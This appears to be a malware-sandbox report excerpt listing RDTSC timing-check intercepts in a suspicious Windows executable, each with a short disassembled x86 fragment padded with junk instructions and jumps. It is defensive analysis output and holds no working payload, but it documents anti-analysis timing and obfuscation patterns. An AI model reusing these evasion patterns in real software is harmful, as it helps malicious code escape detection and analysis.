Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5A51BD second address: 5A51C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5A3E09 second address: 5A3E10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 54D676 second address: 54D718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jc 00007F8124DF87CCh 0x0000000b jbe 00007F8124DF87C6h 0x00000011 popad 0x00000012 push eax 0x00000013 ja 00007F8124DF87D2h 0x00000019 nop 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007F8124DF87C8h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 00000018h 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 mov edx, dword ptr [ebp+122D2E5Dh] 0x0000003a mov cx, 9A37h 0x0000003e mov ebx, dword ptr [ebp+12481624h] 0x00000044 push 00000000h 0x00000046 push edi 0x00000047 call 00007F8124DF87C8h 0x0000004c pop edi 0x0000004d mov dword ptr [esp+04h], edi 0x00000051 add dword ptr [esp+04h], 00000019h 0x00000059 inc edi 0x0000005a push edi 0x0000005b ret 0x0000005c pop edi 0x0000005d ret 0x0000005e or edi, dword ptr [ebp+122D1DBAh] 0x00000064 add eax, ebx 0x00000066 xor dword ptr [ebp+122D29A8h], eax 0x0000006c push eax 0x0000006d push eax 0x0000006e push edx 0x0000006f push eax 0x00000070 push edx 0x00000071 jmp 00007F8124DF87D8h 0x00000076 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 54D718 second address: 54D71C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 54D71C second address: 54D722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 54D722 second address: 54D756 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov ecx, 5C8B0291h 0x00000010 push 00000004h 0x00000012 xor dword ptr [ebp+122D3581h], ebx 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F8124CF45A9h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5A424A second address: 5A4267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8124DF87CDh 0x00000009 jng 00007F8124DF87C6h 0x0000000f popad 0x00000010 pushad 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5A4267 second address: 5A428D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F8124CF4596h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e ja 00007F8124CF459Eh 0x00000014 jne 00007F8124CF459Ah 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5A428D second address: 5A42A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F8124DF87C6h 0x0000000a jmp 00007F8124DF87D2h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5A4407 second address: 5A4428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F8124CF4596h 0x0000000a pop ecx 0x0000000b pushad 0x0000000c jp 00007F8124CF4596h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop ebx 0x00000018 push ebx 0x00000019 jbe 00007F8124CF459Eh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5A4428 second address: 5A4443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 jns 00007F8124DF87C6h 0x0000000d jg 00007F8124DF87C6h 0x00000013 jnp 00007F8124DF87C6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5A825C second address: 5A8262 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5A8262 second address: 5A8289 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F8124DF87C6h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F8124DF87D2h 0x00000012 jno 00007F8124DF87C6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5A79C5 second address: 5A79D5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8124CF4596h 0x00000008 jnl 00007F8124CF4596h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5A79D5 second address: 5A7A13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124DF87CDh 0x00000007 jmp 00007F8124DF87D9h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jbe 00007F8124DF87C6h 0x0000001c ja 00007F8124DF87C6h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5A7A13 second address: 5A7A31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124CF45A8h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5A7A31 second address: 5A7A3F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8124DF87C8h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5A7A3F second address: 5A7A43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5A7B75 second address: 5A7B7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F8124DF87C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5A7B7F second address: 5A7B83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5A7E57 second address: 5A7E68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007F8124DF87C6h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5A7E68 second address: 5A7ED4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124CF45A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F8124CF45A8h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push esi 0x00000012 pop esi 0x00000013 jmp 00007F8124CF45A4h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jnl 00007F8124CF4596h 0x00000021 jmp 00007F8124CF45A8h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5A7ED4 second address: 5A7EE4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jo 00007F8124DF87E6h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5A7EE4 second address: 5A7EEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5A7EEA second address: 5A7EF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5AE6E1 second address: 5AE706 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jp 00007F8124CF4596h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F8124CF45A9h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5AE706 second address: 5AE70D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5AEC82 second address: 5AEC88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5AEC88 second address: 5AEC8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5AEC8C second address: 5AEC9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007F8124CF4598h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5AEC9C second address: 5AECA1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5AF4DB second address: 5AF4F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124CF459Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F8124CF4596h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5AF7A4 second address: 5AF7AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5AF7AA second address: 5AF7B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5AF7B2 second address: 5AF7BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5B4C66 second address: 5B4CA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F8124CF45A8h 0x0000000a pushad 0x0000000b js 00007F8124CF4596h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jnc 00007F8124CF4596h 0x0000001c jmp 00007F8124CF459Dh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 501B07 second address: 501B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 501B0B second address: 501B1D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8124CF4596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5B7FEC second address: 5B800E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e jmp 00007F8124DF87D2h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5B800E second address: 5B8039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 jmp 00007F8124CF459Dh 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop eax 0x00000011 jmp 00007F8124CF45A2h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5B81A1 second address: 5B81AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F8124DF87C6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5B81AE second address: 5B81BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8124CF459Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5B81BF second address: 5B81CB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5B81CB second address: 5B81CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5B81CF second address: 5B81E8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8124DF87C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d js 00007F8124DF87C8h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5B81E8 second address: 5B81EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5B8335 second address: 5B8351 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8124DF87C8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F8124DF87D6h 0x00000012 push eax 0x00000013 push edx 0x00000014 jnp 00007F8124DF87C6h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5B848F second address: 5B8495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5B8495 second address: 5B84AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8124DF87CCh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5C157D second address: 5C158F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F8124CF4596h 0x0000000a jl 00007F8124CF4596h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5C158F second address: 5C1597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5C1597 second address: 5C15A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5C15A0 second address: 5C15A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5C15A6 second address: 5C15CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124CF45A8h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5C1741 second address: 5C1745 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5C20F3 second address: 5C20F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5C20F7 second address: 5C20FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5C23D1 second address: 5C23D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5C2AF5 second address: 5C2B2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124DF87D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F8124DF87CEh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8124DF87CEh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5C110F second address: 5C112F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edi 0x00000007 jmp 00007F8124CF45A2h 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5CB548 second address: 5CB552 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8124DF87C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5CB552 second address: 5CB574 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124CF45A8h 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F8124CF4596h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5CB574 second address: 5CB5C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124DF87CDh 0x00000007 jmp 00007F8124DF87D6h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push edi 0x00000014 pop edi 0x00000015 js 00007F8124DF87C6h 0x0000001b jmp 00007F8124DF87CFh 0x00000020 popad 0x00000021 jnp 00007F8124DF87CAh 0x00000027 push ebx 0x00000028 pop ebx 0x00000029 push ecx 0x0000002a pop ecx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5CB5C2 second address: 5CB5D2 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8124CF45A2h 0x00000008 ja 00007F8124CF4596h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5CB75B second address: 5CB763 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5CB763 second address: 5CB767 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5CB767 second address: 5CB786 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8124DF87D5h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5CD0DD second address: 5CD0E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5CD0E1 second address: 5CD0E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5DCA68 second address: 5DCA7A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F8124CF459Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5DC612 second address: 5DC625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F8124DF87CEh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5DFE26 second address: 5DFE2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5DFE2A second address: 5DFE2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5DF899 second address: 5DF89D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5DF89D second address: 5DF8A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5DFA36 second address: 5DFA45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F8124CF4596h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5DFA45 second address: 5DFA49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5DFA49 second address: 5DFA63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8124CF45A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5E48D1 second address: 5E48DF instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8124DF87C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5E48DF second address: 5E491E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8124CF4596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F8124CF45A1h 0x0000000f jbe 00007F8124CF459Ch 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F8124CF459Bh 0x0000001d push edi 0x0000001e pushad 0x0000001f popad 0x00000020 jbe 00007F8124CF4596h 0x00000026 pop edi 0x00000027 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5E491E second address: 5E4924 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5E4924 second address: 5E4928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 515EE3 second address: 515EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 515EE9 second address: 515EF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	RDTSC instruction interceptor: First address: 5EA92B second address: 5EA944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8124DF87D5h 0x00000009 rdtsc
